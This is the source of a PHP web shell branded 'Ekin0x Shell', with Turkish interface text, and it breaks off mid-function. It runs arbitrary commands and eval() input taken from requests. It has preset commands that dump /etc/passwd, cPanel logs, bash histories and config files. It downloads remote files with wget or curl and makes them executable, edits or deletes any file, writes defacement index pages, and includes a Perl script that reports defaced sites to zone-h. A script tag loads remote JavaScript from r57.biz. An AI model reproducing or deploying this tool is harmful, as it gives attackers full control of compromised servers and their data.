textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
|
||||
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
|
||||
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
|
||||
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
|
||||
</body>
|
||||
</html>
|
||||
<?
|
||||
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
|
||||
<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
|
||||
$sf="<form method=post>";$ef="</form>";
|
||||
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
|
||||
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
|
||||
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
|
||||
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
|
||||
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
|
||||
################# Ending of common variables ########################
|
||||
|
||||
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ##
|
||||
</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
|
||||
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
|
||||
print " - <a href='javascript:history.back()'>Geri</a>";
|
||||
print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
|
||||
if ($dlink=='phpinfo'){print phpinfo();die();}
|
||||
print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
|
||||
print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
|
||||
print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
|
||||
print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
|
||||
print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Izinleri Kontrol Et</a>";
|
||||
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
|
||||
print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
|
||||
print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
|
||||
print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
|
||||
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
|
||||
if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
|
||||
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
|
||||
if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
|
||||
print $sf;input ("text","ncbase",$ncbase,35);print " ";
|
||||
input ("submit","","Decode","");print $ef; die();}
|
||||
if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
|
||||
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
|
||||
print "<p><b>[ Url - Decoder ]</b>"; print $sf;
|
||||
input ("text","nurld",$nurld,35);print " ";
|
||||
input ("submit","","Decode","");print $ef; die();}
|
||||
if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
|
||||
if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
|
||||
print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
|
||||
if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
|
||||
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
|
||||
print "<p><b>[ MD5 - Encoder ]</b>";
|
||||
print $sf;input ("text","nmdf",$nmdf,35);print " ";
|
||||
input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
|
||||
print "<pre>";print "<p><textarea cols=120 rows=12>";
|
||||
if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
|
||||
}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
|
||||
}print "</textarea>";print "</pre>";die();}
|
||||
function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
|
||||
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
|
||||
elseif(isset($showsc)&&filesize($showsc) !=="0") {
|
||||
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
|
||||
if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
|
||||
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
|
||||
input ("text","showsc","",35);print " ";
|
||||
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
|
||||
if ($dlink=='cmdhlp'){
|
||||
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
|
||||
input ("text","hlp","",35);print " ";
|
||||
input ("submit","","Help","");print $ef; die();}
|
||||
if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
|
||||
print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
|
||||
$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
|
||||
if (!function_exists(shell_exec)&&!function_exists(exec)&&
|
||||
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
|
||||
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
|
||||
if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
|
||||
if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
|
||||
{if (touch ($_REQUEST['indx'])==true){
|
||||
$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
|
||||
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
|
||||
] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
|
||||
if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
|
||||
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
|
||||
Your index contents here</textarea></p>";
|
||||
input ("text","indx","Index-name",35);print " ";
|
||||
input ("submit","qindsub","Create","");print $ef;die();}
|
||||
if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
|
||||
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
|
||||
if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
|
||||
if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
|
||||
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
|
||||
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
|
||||
input ("submit","mailsub","Send-mail","");print $ef;die();}
|
||||
if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
|
||||
function callzone($nscdir){
|
||||
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
|
||||
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
|
||||
fwrite ($fpz,"\$arq = @ARGV[0];
|
||||
\$grupo = @ARGV[1];
|
||||
chomp \$grupo;
|
||||
open(a,\"<\$arq\");
|
||||
@site = <a>;
|
||||
close(a);
|
||||
\$b = scalar(@site);
|
||||
for(\$a=0;\$a<=\$b;\$a++)
|
||||
{chomp \$site[\$a];
|
||||
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
|
||||
print \"[+] Sending \$site[\$a]\n\";
|
||||
use IO::Socket::INET;
|
||||
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
|
||||
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
|
||||
print \$sock \"Accept: */*\r\n\";
|
||||
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
|
||||
print \$sock \"Accept-Language: pt-br\r\n\";
|
||||
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
|
||||
print \$sock \"Connection: Keep-Alive\r\n\";
|
||||
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
|
||||
print \$sock \"Host: old.zone-h.org\r\n\";
|
||||
print \$sock \"Content-Length: 385\r\n\";
|
||||
print \$sock \"Pragma: no-cache\r\n\";
|
||||
print \$sock \"\r\n\";
|
||||
print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\";
|
||||
close(\$sock);}");
|
||||
if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
|
||||
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
|
||||
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
|
||||
{print "[ Can't complete the operation !! ]";}
|
||||
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
|
||||
ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
|
||||
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
|
||||
}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
|
||||
print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
|
||||
www.site1.com
|
||||
www.site2.com
|
||||
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
|
||||
input ("submit","zonesub","Send","");print $ef;die();}
|
||||
print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
|
||||
function inisaf($iniv) { $chkini=ini_get($iniv);
|
||||
if(($chkini || strtolower($chkini)) !=='on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";} else{
|
||||
print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
|
||||
if ($chkin==""){print " <font color=red><b>None</b></font>";}
|
||||
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
|
||||
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
|
||||
while (!feof($opop)){ $nval= fgetc($opop);}}
|
||||
elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
|
||||
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
|
||||
if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
|
||||
else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
|
||||
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
|
||||
print"<tr><td>"; print"<center><br>";
|
||||
print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
|
||||
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
|
||||
print "<div align=center>"; print"<br><b>Mysql : </b>";
|
||||
callocmd('which mysql','/usr/bin/mysql');
|
||||
print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
|
||||
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
|
||||
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
|
||||
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
|
||||
callocmd('which GET','/usr/bin/GET');
|
||||
print"</td>"; print"<td>";print"<br><b>Wget : </b>";
|
||||
callocmd('which wget','/usr/bin/wget');
|
||||
print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
|
||||
callocmd('which lynx','/usr/bin/lynx');
|
||||
print"</td>"; print "</tr></table>"; }print "<hr><br>";
|
||||
print "<b>IP Numaran : ".$REMOTE_ADDR."<br></b>";
|
||||
print "<b>Server IP : ".$SERVER_ADDR."</b>";
|
||||
print"<br><b>".$SERVER_SIGNATURE."</b>";
|
||||
print "<b>Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
|
||||
print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
|
||||
print "<b>Kimsin : <b>"; callfuncs('id');print"<br><b>Os : </b>";
|
||||
if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
|
||||
if (!function_exists(shell_exec)&&!function_exists(exec)&&
|
||||
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
|
||||
{print php_uname(); print "/";print PHP_OS;}
|
||||
else {callfuncs('uname -a');}}print"<br>";
|
||||
print"Php-versiyon : ".phpversion(); print"<br><b>Current-path : </b>";
|
||||
print $nscdir." [ ";permcol($nscdir);print " ]";
|
||||
print"<br>";print "Shell'in Burda : " .__file__;
|
||||
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
|
||||
print"Bos Alan: "; readable_size(disk_free_space($nscdir));
|
||||
print "</center><br></font>"; print"</td></tr></table><br>";
|
||||
if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
|
||||
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
|
||||
else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir']))
|
||||
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
|
||||
else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){
|
||||
$ncfile=trim($_REQUEST['cfile']);
|
||||
if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
|
||||
else{ $mess3= "Dosya Olustur/Sil";}}
|
||||
elseif(isset($_REQUEST['delfile'])){
|
||||
$ndfile=trim($_REQUEST['cfile']);
|
||||
if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
|
||||
else {$mess3= "Dosya Olustur/Sil";}}
|
||||
else {$mess3="Dosya Olustur/Sil";}
|
||||
class upload{ function upload($file,$tmp){
|
||||
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
|
||||
if (@copy($tmp,$nscdir."/".$file)){
|
||||
print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
|
||||
$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
|
||||
$ustname=trim ($_REQUEST['ustname']);ob_start();
|
||||
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
|
||||
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
|
||||
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
|
||||
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
|
||||
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
|
||||
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
|
||||
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
|
||||
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
|
||||
if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
|
||||
if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
|
||||
!isset($_REQUEST['rfiletxt'])){
|
||||
if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
|
||||
$files[] = $filename; sort($files);}print "<br>";
|
||||
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
|
||||
print "<tr><td width=43% style=\"border:1px solid black\">";
|
||||
print "<center><b>Dosyalar";print "</td>";
|
||||
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Boyut";print "</td>";
|
||||
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Yazma";print "</td>";
|
||||
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Okuma";print "</td>";
|
||||
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Tür";print "</td>";
|
||||
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Düzenleme";print "</td>";
|
||||
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Adlandirma";print "</td>";
|
||||
print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Indir";print "</td>";if(strstr(PHP_OS,"Linux")){
|
||||
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Group";print "</td>";}
|
||||
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Izinler";print "</td></tr>"; foreach ($files as $nfiles){
|
||||
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
|
||||
if (is_writable("$nscdir/$nfiles")){
|
||||
$scmess2= "<center><font color=DeepSkyBlue >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
|
||||
$scmess3= "<center><font color=DeepSkyBlue >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=DeepSkyBlue >Dosya";}
|
||||
print"<tr><td style=\"border:1px solid black\">";
|
||||
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
|
||||
print"</td>"; print "<td style=\"border:1px solid black\">";
|
||||
print "<center><font face= tahoma size=2 color=#dadada>";
|
||||
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
|
||||
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
|
||||
print "</td>"; print "<td style=\"border:1px solid black\">";
|
||||
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
|
||||
print"<td style=\"border:1px solid black\">";
|
||||
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
|
||||
print "<td style=\"border:1px solid black\">";
|
||||
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
|
||||
print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
|
||||
print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid black\">";
|
||||
if(is_file("$nscdir/$nfiles")){
|
||||
print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
|
||||
print "<td style=\"border:1px solid black\">";
|
||||
print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
|
||||
print "</center>";print"</td>";}
|
||||
print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
|
||||
permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
|
||||
}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
|
||||
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
|
||||
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
|
||||
print "<pre><center>".$sta;
|
||||
if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
|
||||
elseif(isset($_REQUEST['eval'])){
|
||||
ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
|
||||
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
|
||||
elseif (isset($_REQUEST['subqcmnds'])){
|
||||
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
|
||||
if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
|
||||
if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
|
||||
if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
|
||||
if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
|
||||
if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
|
||||
if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
|
||||
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
|
||||
if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
|
||||
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
|
||||
if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
|
||||
if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
|
||||
if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
|
||||
}print $eta."</center></pre>";}
|
||||
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
|
||||
if(is_readable($rfile)&&is_file($rfile)){
|
||||
$fp=fopen ($rfile,"r");print"<center>";
|
||||
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
|
||||
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
|
||||
while (!feof($fp)){$lines = fgetc($fp);
|
||||
$nlines=htmlspecialchars($lines);print $nlines;}
|
||||
fclose($fp);print "</textarea>";if (is_writable($rfile)){
|
||||
print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
|
||||
{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
|
||||
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
|
||||
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
|
||||
if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
|
||||
$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
|
||||
fwrite ($rffp,$rfiletxt);print "<div><b><center>
|
||||
[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
|
||||
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
|
||||
</center></b></div><br>";fclose($rffp);}
|
||||
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
|
||||
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
|
||||
elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
|
||||
function callperms($chkperms){
|
||||
$perms = fileperms($chkperms);
|
||||
|
||||
if (($perms & 0xC000) == 0xC000) {
|
||||
// Socket
|
||||
$info = 's';
|
||||
} elseif (($perms & 0xA000) == 0xA000) {
|
||||
// Symbolic Link
|
||||
$info = 'l';
|
||||
} elseif (($perms & 0x8000) == 0x8000) {
|
||||
// Regular
|
||||
$info = '-';
|
||||
} elseif (($perms & 0x6000) == 0x6000) {
|
||||
// Block special
|
||||
$info = 'b';
|
||||
} elseif (($perms & 0x4000) == 0x4000) {
|
||||
// Directory
|
||||
$info = 'd';
|
||||
} elseif (($perms & 0x2000) == 0x2000) {
|
||||
// Character special
|
||||
$info = 'c';
|
||||
} elseif (($perms & 0x1000) == 0x1000) {
|
||||
// FIFO pipe
|
||||
$info = 'p';
|
||||
} else {
|
||||
// Unknown
|
||||
$info = 'u';
|
||||
}
|
||||
|
||||
// Owner
|
||||
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0040) ?
|
||||
(($perms & 0x0800) ? 's' : 'x' ) :
|
||||
(($perms & 0x0800) ? 'S' : '-'));
|
||||
|
||||
// Group
|
||||
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0008) ?
|
||||
(($perms & 0x0400) ? 's' : 'x' ) :
|
||||
(($perms & 0x0400) ? 'S' : '-'));
|
||||
|
||||
// World
|
||||
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0001) ?
|
||||
(($perms & 0x0200) ? 't' : 'x' ) :
|
||||
(($perms & 0x0200) ? 'T' : '-')); print $info;}
|
||||
|
||||
function readable_size($size) {
|
||||
|
||||
if ($size < 1024) {
|
||||
print $size . ' B';
|
||||
}else {$units = array("kB", "MB", "GB", "TB");
|
||||
foreach ($units as $unit) {
|
||||
$size = ($size / 1024);
|
||||
if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
|
||||
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
|
||||
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
|
||||
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
|
||||
input ("text","renf","New-name",20);print " ";
|
||||
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
|
||||
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
|
||||
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
|
||||
print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
|
||||
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
|
||||
print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
|
||||
print $sf."<textarea cols=157 rows=23 name=edittxt>";
|
||||
$alltxt= file_get_contents($_REQUEST['edit']);
|
||||
$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
|
||||
if (is_writable($_REQUEST['edit'])){
|
||||
print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
|
||||
